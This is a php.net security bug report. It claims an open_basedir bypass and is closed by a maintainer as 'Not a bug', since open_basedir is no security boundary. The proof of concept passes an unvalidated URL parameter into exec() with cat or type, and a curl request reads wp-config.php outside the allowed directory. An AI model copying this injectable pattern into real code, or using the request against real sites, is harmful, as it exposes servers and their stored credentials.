php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #81715 Apache + PHP <= 8.1.4 open_basedir bypass‏‏
Submitted: 2022-04-06 19:14 UTC Modified: 2022-04-07 09:46 UTC
From: phpforwork at gmail dot com Assigned: cmb (profile)
Status: Not a bug Package: *Directory/Filesystem functions
PHP Version: 8.1.4 OS: Linux/Windows
Private report: No CVE-ID: None
 [2022-04-06 19:14 UTC] phpforwork at gmail dot com
Description:
------------
Description:
=============
open_basedir security feature can be bypassed and read the file outside the open_basedir path.


Proof of Concept
================
0. The target file you want to read C:/xampp/htdocs/wp-config.php
1. Set open_basedir as a security feature in php.ini file :
open_basedir = C:/xampp/htdocs/test
2. Make a PHP script, "bypass.php" inside folder *test* :
<?php
$dir = new SplFileInfo($_GET['file']);
var_dump(exec("type ".$dir->getRealPath()." > result.txt"));
?>
for Linux webserver :
<?php
$dir = new SplFileInfo($_GET['file']);
var_dump(exec("cat ".$dir->getRealPath()." > result.txt"));
?>
3. Call the script :
curl localhost/test/bypass.php?file=../wp-config.php
4. You will see the full content of the file here : result.txt

Tested with PHP 5.6.3 and 7.x. and 8.x.
=====================

Reported by : Saleh 0xHunter ( twitter.com/0xhunter )

Test script:
---------------
For Windows webserver :
<?php
$dir = new SplFileInfo($_GET['file']);
var_dump(exec("type ".$dir->getRealPath()." > result.txt"));
?>
for Linux webserver :
<?php
$dir = new SplFileInfo($_GET['file']);
var_dump(exec("cat ".$dir->getRealPath()." > result.txt"));
?>


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2022-04-07 09:46 UTC] cmb@php.net
-Status: Open +Status: Not a bug -Assigned To: +Assigned To: cmb
 [2022-04-07 09:46 UTC] cmb@php.net
From the PHP manual[1]:

| open_basedir is just an extra safety net, that is in no way
| comprehensive, and can therefore not be relied upon when security
| is needed.

Consequently, our security classification[2] doesn't regard
open_basedir bypasses as security issues.

External programs just don't know about open_basedir.  For several
reasons, user input that is passed to any of the program execution
functions needs to be thoroughly validated by the userland script;
in this case you want to introduce some allow-list and verify that
the supplied path is in that list, and otherwise reject the
request.

[1] <https://www.php.net/manual/en/ini.core.php#ini.open-basedir>
[2] <https://wiki.php.net/security>
 
PHP Copyright © 2001-2023 The PHP Group
All rights reserved.
Last updated: Tue Dec 05 16:01:29 2023 UTC